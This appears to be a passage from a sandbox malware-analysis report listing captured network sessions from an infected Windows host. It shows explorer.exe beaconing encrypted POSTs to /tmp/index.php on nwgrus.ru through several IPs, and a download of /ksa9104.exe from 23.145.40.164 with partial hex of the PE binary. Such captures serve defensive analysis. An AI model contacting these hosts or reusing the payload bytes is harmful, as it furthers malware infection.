20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49773 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:23.976464033 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eihcpyqadleca.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 307
Host: nwgrus.ru
Oct 8, 2024 00:20:23.976478100 CEST | 307 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 4e 2b fe 80
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuN+EDaEHZf|ua_X=m$:JGKWT@+@99GfL;lf>/q9+YU]-m{FR
Oct 8, 2024 00:20:24.908112049 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:24 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49774 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:24.926609993 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://olgjjvecsjugbyj.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 128
Host: nwgrus.ru
Oct 8, 2024 00:20:24.926647902 CEST | 128 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 3b 49 da bb
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu;Io5rc&:M-mJV"{
Oct 8, 2024 00:20:26.072292089 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49786 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:26.082185030 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wjiuupaachvppk.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 288
Host: nwgrus.ru
Oct 8, 2024 00:20:26.082211971 CEST | 288 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 72 23 df eb
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vur#s;z2+#1m~6c|h:HKpN84&Fo^4K?q]uHPAu!'t,dmo~$1
Oct 8, 2024 00:20:26.857687950 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:26 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 50057 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:21:32.500380039 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://csuhbuxabuhlm.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 275
Host: nwgrus.ru
Oct 8, 2024 00:21:32.500399113 CEST | 275 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 57 3c d5 91
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vuW<vIPxs*,]s71c&-Zo\R!pGETo^#$n.;3ra7Cpv.dmye; f
Oct 8, 2024 00:21:33.566517115 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:21:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 50058 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:21:34.419028044 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lixbbuexbbyxijy.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 140
Host: nwgrus.ru
Oct 8, 2024 00:21:34.419050932 CEST | 140 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 50 28 a0 a5
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vuP(KRCaVsE[Ho5:4e-V2TG8v~
Oct 8, 2024 00:21:35.197633028 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:21:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 50059 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:21:36.966672897 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://snydbdaflsjf.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 140
Host: nwgrus.ru
Oct 8, 2024 00:21:36.966702938 CEST | 140 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 47 58 c6 bd
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vuGX#OQWW0IGqH,8]35E~
Oct 8, 2024 00:21:37.723088026 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:21:37 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 50060 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:21:38.994489908 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://toxykxlssds.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 112
Host: nwgrus.ru
Oct 8, 2024 00:21:38.994489908 CEST | 112 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 54 4e ef 9a
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vuTNh!FCL5WW*AtX
Oct 8, 2024 00:21:39.804027081 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:21:39 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 50061 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:21:51.599035978 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wujymmrsholuwdm.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 148
Host: nwgrus.ru
Oct 8, 2024 00:21:51.599056005 CEST | 148 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 5b c0 89
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vu1[b3vY`q@8U 4YFF\JXM/zGHh
Oct 8, 2024 00:21:52.354597092 CEST | 151 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:21:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 03 00 00 00 72 e8 84
Data Ascii: r


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      38192.168.2.450062109.175.29.39802580C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 00:22:07.699738979 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://anhllontjkcoc.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 277
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:22:07.699768066 CEST | 277 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 44 b4 ae
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vu#DIGcbau'h~&g{Qp;ZV(_.ZFBs[D< #\\<` t"CNAPVo+QCJ>
                                                                                                      Oct 8, 2024 00:22:08.471247911 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:22:08 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                      Data Ascii: r


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      39 | 192.168.2.4 | 50064 | 211.171.233.129 | 80 | 2580 | C:\Windows\explorer.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 8, 2024 00:22:28.580086946 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://dfdglghjacuv.net/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 170
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:22:28.580101013 CEST | 170 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 49 4f a0 8e
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vuIOv:dQwa$_kww.PWe>1c(]8{*E0q^d
                                                                                                      Oct 8, 2024 00:22:30.172260046 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:22:29 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                      Data Ascii: r


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      40 | 192.168.2.4 | 50066 | 211.171.233.129 | 80 | 2580 | C:\Windows\explorer.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 8, 2024 00:22:51.271368027 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://efoitwxyetuahvcx.com/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 369
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:22:51.271368027 CEST | 369 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2d 5f f8 83
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vu-_Z^JIjOZ3Ybvfxi+[[_?Fqy&4s#E8CqNa|lm%MJEQ'XkTFycsY__,
                                                                                                      Oct 8, 2024 00:22:52.888025045 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:22:52 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                      Data Ascii: r


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      41 | 192.168.2.4 | 50068 | 211.171.233.129 | 80 | 2580 | C:\Windows\explorer.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 8, 2024 00:23:16.756416082 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Accept: */*
                                                                                                      Referer: http://wgvksgwflrvxis.org/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Content-Length: 240
                                                                                                      Host: nwgrus.ru
                                                                                                      Oct 8, 2024 00:23:16.756416082 CEST | 240 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 3e c7 fd
                                                                                                      Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA .[k,vu1>m$zAX/31XP7pM$*@faO/9qQ|&qbM:Cby``7Wik3Xa-k.9
                                                                                                      Oct 8, 2024 00:23:20.287751913 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.26.0
                                                                                                      Date: Mon, 07 Oct 2024 22:23:18 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                      Data Ascii: r


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      0 | 192.168.2.4 | 49760 | 23.145.40.164 | 443 | 2580 | C:\Windows\explorer.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2024-10-07 22:20:17 UTC | 162 | OUT | GET /ksa9104.exe HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: 23.145.40.164
                                                                                                      2024-10-07 22:20:17 UTC | 327 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Mon, 07 Oct 2024 22:20:17 GMT
                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Last-Modified: Mon, 07 Oct 2024 22:00:03 GMT
                                                                                                      ETag: "6ec00-623ea249027e4"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 453632
                                                                                                      Connection: close
                                                                                                      Content-Type: application/x-msdos-program
                                                                                                      2024-10-07 22:20:17 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7f a4 92 11 3b c5 fc 42 3b c5 fc 42 3b c5 fc 42 54 b3 62 42 23 c5 fc 42 54 b3 57 42 1c c5 fc 42 54 b3 56 42 57 c5 fc 42 32 bd 6f 42 3c c5 fc 42 3b c5 fd 42 b3 c5 fc 42 54 b3 53 42 3a c5 fc 42 54 b3 66 42 3a c5 fc 42 54 b3 61 42 3a c5 fc 42 52 69 63 68 3b c5 fc 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cd bc 63 64 00 00 00
                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$;B;B;BTbB#BTWBBTVBWB2oB<B;BBTSB:BTfB:BTaB:BRich;BPELcd
                                                                                                      2024-10-07 22:20:17 UTC8000INData Raw: 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 1c 2c 40 00 8b ff f7 d9 ff 24 8d cc 2b 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 20 2b 40 00 ff 24 8d 1c 2c 40 00 90 30 2b 40 00 54 2b 40 00 7c 2b 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 1c 2c 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 1c 2c 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 1c 2c 40 00 8d 49 00 d0 2b 40 00 d8 2b 40 00
                                                                                                      Data Ascii: FGFGE^_t1|9u$r$,@$+@Ir+$ +@$,@0+@T+@|+@F#Gr$,@IF#GFGr$,@F#GFGFGV$,@I+@+@
